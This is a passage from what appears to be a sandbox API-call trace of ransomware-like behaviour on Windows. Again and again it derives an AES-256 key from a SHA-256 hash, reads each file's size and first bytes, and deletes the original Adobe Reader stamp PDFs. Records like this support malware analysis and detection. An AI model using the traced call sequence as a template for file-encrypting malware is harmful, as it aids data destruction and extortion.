phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0212.108] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0212.108] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0212.108] GetFileSize (in: hFile=0x664, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9d75 [0212.108] ReadFile (in: hFile=0x664, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0212.147] CryptDestroyHash (hHash=0x284d768) returned 1 [0212.147] CryptDestroyKey (hKey=0x284d728) returned 1 [0212.147] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0212.150] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\fra\\signhere.pdf")) returned 1 [0212.151] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0212.152] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0212.152] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0212.152] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0212.152] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x44925 [0212.152] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0212.288] CryptDestroyHash (hHash=0x284d668) returned 1 [0212.288] CryptDestroyKey (hKey=0x284d728) returned 1 [0212.288] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0212.289] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\FRA\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\fra\\standardbusiness.pdf")) returned 1 [0212.332] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0212.477] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0212.477] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0212.478] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0212.478] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0212.478] GetFileSize (in: hFile=0x664, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x21a02 [0212.478] ReadFile (in: hFile=0x664, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0212.503] CryptDestroyHash (hHash=0x284d768) returned 1 [0212.503] CryptDestroyKey (hKey=0x284d728) returned 1 [0212.503] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0212.504] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hrv\\dynamic.pdf")) returned 1 [0212.506] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0212.507] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0212.507] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0212.507] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0212.507] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x80f5 [0212.507] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0212.524] CryptDestroyHash (hHash=0x284d668) returned 1 [0212.524] CryptDestroyKey (hKey=0x284d728) returned 1 [0212.524] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0212.526] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hrv\\faces.pdf")) returned 1 [0212.527] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0212.528] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0212.528] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0212.528] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0212.528] GetFileSize (in: hFile=0x664, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb731 [0212.528] ReadFile (in: hFile=0x664, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0212.588] CryptDestroyHash (hHash=0x284d768) returned 1 [0212.588] CryptDestroyKey (hKey=0x284d728) returned 1 [0212.588] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0212.590] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hrv\\pointers.pdf")) returned 1 [0212.591] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0212.592] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0212.592] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0212.592] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0212.592] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb6cc [0212.592] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0212.601] CryptDestroyHash (hHash=0x284d668) returned 1 [0212.601] CryptDestroyKey (hKey=0x284d728) returned 1 [0212.601] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0212.602] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hrv\\signhere.pdf")) returned 1 [0212.604] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0212.604] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0212.604] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0212.604] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0212.604] GetFileSize (in: hFile=0x664, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c4f5 [0212.604] ReadFile (in: hFile=0x664, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0212.626] CryptDestroyHash (hHash=0x284d768) returned 1 [0212.626] CryptDestroyKey (hKey=0x284d728) returned 1 [0212.626] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0212.628] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hrv\\standard.pdf")) returned 1 [0212.629] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0212.630] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0212.630] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0212.630] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0212.630] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1b7c1 [0212.630] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0212.702] CryptDestroyHash (hHash=0x284d668) returned 1 [0212.702] CryptDestroyKey (hKey=0x284d728) returned 1 [0212.702] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0212.703] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hrv\\standardbusiness.pdf")) returned 1 [0212.707] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0212.707] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0212.708] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0212.708] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0212.708] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0212.708] GetFileSize (in: hFile=0x664, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbb3e [0212.708] ReadFile (in: hFile=0x664, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0212.725] CryptDestroyHash (hHash=0x284d768) returned 1 [0212.725] CryptDestroyKey (hKey=0x284d728) returned 1 [0212.725] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0212.725] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\dynamic.pdf")) returned 1 [0212.727] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0212.727] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0212.727] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0212.727] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0212.727] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x80f5 [0212.727] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0212.736] CryptDestroyHash (hHash=0x284d668) returned 1 [0212.736] CryptDestroyKey (hKey=0x284d728) returned 1 [0212.736] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0212.738] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\Faces.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\faces.pdf")) returned 1 [0212.739] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0212.740] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0212.740] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0212.740] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0212.740] GetFileSize (in: hFile=0x664, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb731 [0212.740] ReadFile (in: hFile=0x664, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0212.784] CryptDestroyHash (hHash=0x284d768) returned 1 [0212.784] CryptDestroyKey (hKey=0x284d728) returned 1 [0212.784] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0212.785] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\pointers.pdf")) returned 1 [0212.786] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0212.787] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0212.787] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0212.787] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0212.787] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9083 [0212.787] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0212.798] CryptDestroyHash (hHash=0x284d668) returned 1 [0212.798] CryptDestroyKey (hKey=0x284d728) returned 1 [0212.798] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0212.800] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\signhere.pdf")) returned 1 [0212.801] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0212.802] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0212.802] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0212.802] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0212.802] GetFileSize (in: hFile=0x664, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1c4f5 [0212.802] ReadFile (in: hFile=0x664, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0212.822] CryptDestroyHash (hHash=0x284d768) returned 1 [0212.822] CryptDestroyKey (hKey=0x284d728) returned 1 [0212.822] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0212.823] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\standard.pdf")) returned 1 [0212.825] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0212.825] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0212.825] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0212.825] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0212.871] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x17b14 [0212.871] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0212.886] CryptDestroyHash (hHash=0x284d668) returned 1 [0212.886] CryptDestroyKey (hKey=0x284d728) returned 1 [0212.886] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0212.887] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\standardbusiness.pdf")) returned 1 [0212.890] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0212.970] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0212.970] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0212.970] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0212.970] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0212.970] GetFileSize (in: hFile=0x664, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xca88 [0212.970] ReadFile (in: hFile=0x664, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0212.978] CryptDestroyHash (hHash=0x284d768) returned 1 [0212.978] CryptDestroyKey (hKey=0x284d728) returned 1 [0212.978] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0212.979] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ita\\dynamic.pdf")) returned 1 [0212.980] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0212.980] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0212.980] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0212.981] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0212.981] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8ff9 [0212.981] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0212.987] CryptDestroyHash (hHash=0x284d668) returned 1 [0212.987] CryptDestroyKey (hKey=0x284d728) returned 1 [0212.987] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0212.988] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ita\\signhere.pdf")) returned 1 [0212.990] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0212.990] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0212.990] CryptHashData (hHash=0x284d768, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0212.990] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d768, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0212.990] GetFileSize (in: hFile=0x664, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18575 [0212.990] ReadFile (in: hFile=0x664, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0213.024] CryptDestroyHash (hHash=0x284d768) returned 1 [0213.024] CryptDestroyKey (hKey=0x284d728) returned 1 [0213.024] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0213.026] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ITA\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ita\\standardbusiness.pdf")) returned 1 [0213.041] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0213.099] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3267c1c*=0xa52568) returned 1 [0213.100] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3267c20 | out: phHash=0x3267c20) returned 1 [0213.100] CryptHashData (hHash=0x284d668, pbData=0x9d1458, dwDataLen=0x100, dwFlags=0x0) returned 1 [0213.100] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3267c14 | out: phKey=0x3267c14*=0x284d728) returned 1 [0213.100] GetFileSize (in: hFile=0x644, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcc2c [0213.100] ReadFile (in: hFile=0x644, lpBuffer=0x3267c94, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3267c24, lpOverlapped=0x0 | out: lpBuffer=0x3267c94*, lpNumberOfBytesRead=0x3267c24*=0x80, lpOverlapped=0x0) returned 1 [0213.108] CryptDestroyHash (hHash=0x284d668) returned 1 [0213.108] CryptDestroyKey (hKey=0x284d728) returned 1 [0213.108] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0213.109] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\jpn\\dynamic.pdf")) returned 1 [0213.110] CryptAcquireContextW (in: phProv=0x3267c1c, szContainer=0x0, szProvider="Microsoft 